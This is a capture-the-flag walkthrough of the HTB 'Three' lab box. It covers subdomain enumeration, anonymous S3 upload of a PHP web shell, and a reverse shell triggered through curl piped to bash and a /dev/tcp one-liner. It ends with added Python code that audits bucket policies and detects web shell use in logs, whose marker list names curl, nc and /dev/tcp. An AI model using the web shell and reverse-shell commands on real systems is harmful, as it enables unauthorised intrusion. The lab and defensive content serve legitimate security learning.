HTB Three walkthrough
First, we ping the target IP address to confirm it is reachable and export it as a shell variable ($ip) so the later commands can refer to it.
Task 1: How many TCP ports are open?
Ans: 2
I ran nmap -sV -vv -T4 $ip
Task 2: What is the domain of the email address provided in the “Contact” section of the website?
Ans: thetoppers.htb
I went to the website via the IP address provided when I connected to the box. The email provided in the "Contact" section is mail@thetoppers.htb.
Task 3: In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
Ans: /etc/hosts
Task 4: Which sub-domain is discovered during further enumeration?
Ans: s3.thetoppers.htb
From the hint, we need to use a tool like wfuzz or ffuf to enumerate. I've never used these tools before, so I had to run wfuzz --help to understand the options available to me.
A quick Google search for "wfuzz enumeration" brought up a few websites:
- https://viperone.gitbook.io/pentest-everything/everything/everything-web/sub-domain-enumeration
- under wfuzz they list the command
- wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://love.htb" -H "Host: FUZZ.love.htb" --hl 125
A quick read-through of this revealed that I do not have the wordlist. I need to download the wordlist from
- https://github.com/theMiddleBlue/DNSenum/blob/master/wordlist/subdomains-top1mil-20000.txt
- we can use
- git clone https://github.com/theMiddleBlue/DNSenum/blob/master/wordlist/subdomains-top1mil-20000.txt
- IDK why, but the repository could not be found. I had to manually download it and copy it over to my Kali Linux.
- later I realised that it can be found under /usr/share/SecLists (the S and the L are capitalized), silly me.
wfuzz -c -w subdomains-top1mil-20000.txt -u $ip/FUZZ
- I used this on my first attempt. It only started running after I added the /FUZZ and -c.
- But… I didn't get any hits.
- back to the drawing board.
- I downloaded another wordlist from https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt and ran the same command again.
I later realized that with -u $ip/FUZZ I was fuzzing directories instead of subdomains. If we want to look for subdomains, we have to put the FUZZ keyword in front of the hostname.
e.g. FUZZ.thetoppers.htb
wfuzz -c -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb"
Idk why, but there were still no hits when I ran this again.
I gave up and used gobuster instead of wfuzz. It’s weird how they put it as a hint although the walkthroughs and videos I watched used gobuster instead.
I ran
- gobuster vhost -u http://thetoppers.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
- we need the --append-domain flag because my gobuster is version 3.4.
and it worked.
Task 5: Which service is running on the discovered sub-domain?
Ans: Amazon s3
It's part of AWS.
Task 6: Which command line utility can be used to interact with the service running on the discovered sub-domain?
Ans: awscli
It stands for AWS Command Line Interface.
Task 7: Which command is used to set up the AWS CLI installation?
Ans: aws configure
Task 8: What is the command used by the above utility to list all of the S3 buckets?
Ans: aws s3 ls
Task 9: This server is configured to run files written in what web scripting language?
Ans: php
Submit root flag.
First, I had to install awscli with the command apt install awscli
Next, we have to configure aws with aws configure
- every value it prompts for (access key, secret key, region, output format) can be set to a placeholder such as temp
Next, we have to find out about the s3 buckets hosted by the server using the command from task 8.
- aws --endpoint=http://s3.thetoppers.htb s3 ls
We can find out the files listed through the command
- aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
helpful link: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/AWS%20Amazon%20Bucket%20S3
To get our own files onto the server, we can copy them into the bucket. First, we need to create a PHP shell and upload it to the S3 bucket.
I created the file using nano shell.php
Inside the file, I put <?php system($_GET["cmd"]); ?>
- <?php opens a block of PHP code
- $_GET holds the parameters from the URL query string
- ["cmd"] selects the cmd parameter, whose value is handed to system() and run as a shell command
- ?> closes the PHP block
Next, we need to upload the shell.php to the website. We can do so with the following command
- aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
- cp is to copy/upload shell.php
We can test if it works by going to http://thetoppers.htb/shell.php
We can try to run commands in the URL itself by going to http://thetoppers.htb/shell.php?cmd=whoami
The response from the website verifies that we have code execution.
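The reason the upload works is that the bucket accepts list and write requests from an unauthenticated client, which is exactly what a bucket policy granting s3:ListBucket and s3:PutObject to Principal "*" does. The following is an added example, not part of this walkthrough or of the box, that audits a bucket policy document for such grants using only the Python standard library. The two policy documents and their Sid values are constructed for the example.

```python
"""Audit an S3 bucket policy for anonymous list/write grants.

Added example (not from the HTB Three walkthrough): the box's bucket accepts
`s3 ls` and `s3 cp` from an unauthenticated client, which is the behaviour a
statement such as the constructed WEAK_POLICY below would grant. Only the
json and fnmatch standard-library modules are used.
"""
import fnmatch
import json

# Actions that let an anonymous caller enumerate or modify bucket contents.
SENSITIVE_ACTIONS = ("s3:ListBucket", "s3:PutObject", "s3:DeleteObject", "s3:PutObjectAcl")

# Constructed policy: public listing and upload, plus a conditioned delete grant.
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicListAndWrite", "Effect": "Allow", "Principal": "*",
         "Action": ["s3:ListBucket", "s3:PutObject"],
         "Resource": ["arn:aws:s3:::thetoppers.htb", "arn:aws:s3:::thetoppers.htb/*"]},
        {"Sid": "OfficeOnlyDelete", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "s3:DeleteObject", "Resource": "arn:aws:s3:::thetoppers.htb/*",
         "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
    ],
})

# Constructed policy: the static site is still readable, but nothing more.
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicReadOnly", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thetoppers.htb/*"},
    ],
})


def _as_list(value):
    """IAM allows a string or a list in most fields; normalise to a list."""
    return value if isinstance(value, list) else [value]


def principal_is_anonymous(principal):
    """True when the statement's Principal covers every caller ("*")."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(p == "*" for p in _as_list(principal.get("AWS", [])))
    return False


def matching_actions(actions):
    """Expand IAM wildcards (s3:*, s3:Put*) against the sensitive action list."""
    hits = set()
    for pattern in _as_list(actions):
        for action in SENSITIVE_ACTIONS:
            if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                hits.add(action)
    return sorted(hits)


def audit_policy(policy_json):
    """Return (Sid, [actions]) for every Allow statement that grants a
    sensitive S3 action to anonymous principals without any Condition."""
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not principal_is_anonymous(stmt.get("Principal", {})):
            continue
        if stmt.get("Condition"):
            # A Condition (e.g. aws:SourceIp) narrows the grant; review it separately.
            continue
        actions = matching_actions(stmt.get("Action", []))
        if actions:
            findings.append((stmt.get("Sid", "<no Sid>"), actions))
    return findings


if __name__ == "__main__":
    for name, doc in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, audit_policy(doc))
```

Against the weak document the audit reports the PublicListAndWrite statement and skips the IP-restricted delete grant; the hardened document, which only allows s3:GetObject, produces no findings, so the site stays readable while anonymous listing and uploads are gone.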
The next step is to obtain a reverse shell.
STEPS TO OBTAIN A REVERSE SHELL
1. Identify the IP address that you are on.
- from ifconfig
- we are looking for the tun0 address, which is the interface of the VPN that connects us to HTB.
- The IP address is 10.10.14.119
2. Create a new file called shell.sh
- the script must contain a payload
- bash -i >& /dev/tcp/<your ip address>/1337 0>&1
- or you can go to https://www.revshells.com/ and create your own.
3. start a webserver
- python3 -m http.server 8080
4. start a listener
- nc -lvnp 1337
5. run http://thetoppers.htb/shell.php?cmd=curl%2010.10.14.119:8080/shell.sh|bash in the url.
- %20 is the URL-encoded version of a space ( )
- 10.10.14.119 is your own IP address (the tun0 address from step 1)
- :8080 is the port the web server is running on.
- shell.sh is the payload that we have created just now.
- | is the pipe operator (ctrl +\); it feeds the output of curl into the next command.
- bash: take shell.sh and run it in a new bash instance.
6. The listener should now have caught the reverse shell.
In this case, we have access to the shell and we can try to find the root flag from here.
We can look through the directories to find our flag.txt, and voila!
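Seen from the web server's side, the two noisy parts of this walkthrough are the virtual-host brute force (one client sending many different Host headers) and the web shell traffic (a .php resource taking a cmd parameter whose decoded value is a shell command chain). The following is an added example, not part of this walkthrough, of detection logic for both run over constructed access-log lines. It assumes a custom Apache LogFormat of "%{Host}i %h %l %u %t \"%r\" %>s %b", i.e. the client's Host header prepended to the common log format; the log lines, hostnames and client addresses are constructed for the example.

```python
"""Detect vhost brute forcing and web shell use in access logs.

Added example, not from the HTB Three walkthrough. Assumed log format:
  %{Host}i %h %l %u %t "%r" %>s %b
The SAMPLE_LOG lines below are constructed for this example.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Parameter names commonly used by one-line web shells; cmd is the one in the walkthrough.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}
# Substrings whose presence in a decoded value indicates a command chain or download.
SHELL_MARKERS = ("curl ", "wget ", "|", ";", "&&", "bash", "/dev/tcp/", "nc ")

SAMPLE_LOG = [
    'thetoppers.htb 10.10.14.119 - - [10/May/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 11952',
    'www.thetoppers.htb 10.10.14.119 - - [10/May/2024:12:00:02 +0000] "GET / HTTP/1.1" 200 11952',
    'mail.thetoppers.htb 10.10.14.119 - - [10/May/2024:12:00:02 +0000] "GET / HTTP/1.1" 200 11952',
    'dev.thetoppers.htb 10.10.14.119 - - [10/May/2024:12:00:03 +0000] "GET / HTTP/1.1" 200 11952',
    's3.thetoppers.htb 10.10.14.119 - - [10/May/2024:12:00:03 +0000] "GET / HTTP/1.1" 200 35',
    'thetoppers.htb 10.10.14.5 - - [10/May/2024:12:01:10 +0000] "GET /images/band.jpg HTTP/1.1" 200 90210',
    'thetoppers.htb 10.10.14.119 - - [10/May/2024:12:05:44 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 25',
    'thetoppers.htb 10.10.14.119 - - [10/May/2024:12:06:02 +0000] '
    '"GET /shell.php?cmd=curl%2010.10.14.119:8080/shell.sh|bash HTTP/1.1" 200 0',
]


def parse_line(line):
    """Parse one access-log line into a dict of fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def vhost_scanners(lines, min_hosts=5):
    """Return {client_ip: distinct Host count} for clients that asked for
    at least min_hosts different virtual hosts. Normal browsing uses one
    or two hosts; a wordlist-driven vhost scan uses hundreds."""
    hosts_by_ip = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec:
            hosts_by_ip[rec["ip"]].add(rec["host"].lower())
    return {ip: len(hosts) for ip, hosts in hosts_by_ip.items() if len(hosts) >= min_hosts}


def webshell_requests(lines):
    """Return one finding per request that passes a shell-style parameter to
    a .php resource. 'command' is the URL-decoded value; 'chained' is True
    when it contains pipe/download markers (e.g. curl ... | bash)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        url = urlsplit(rec["target"])
        if not url.path.lower().endswith(".php"):
            continue
        # parse_qs percent-decodes, so %20 becomes a space here.
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            if name.lower() not in SHELL_PARAMS:
                continue
            for value in values:
                findings.append({
                    "ip": rec["ip"], "path": url.path, "param": name, "command": value,
                    "chained": any(marker in value for marker in SHELL_MARKERS),
                })
    return findings


if __name__ == "__main__":
    print("vhost scanners:", vhost_scanners(SAMPLE_LOG))
    for hit in webshell_requests(SAMPLE_LOG):
        print("web shell:", hit)
```

On the constructed log the scanner check flags 10.10.14.119 (five distinct Host values) and not the ordinary visitor, and the web shell check returns both shell.php requests, with the second marked as chained because its decoded value contains "curl ", "|" and "bash". A real deployment would tune min_hosts and the marker list to the site's own traffic and alert on the first finding rather than after the fact.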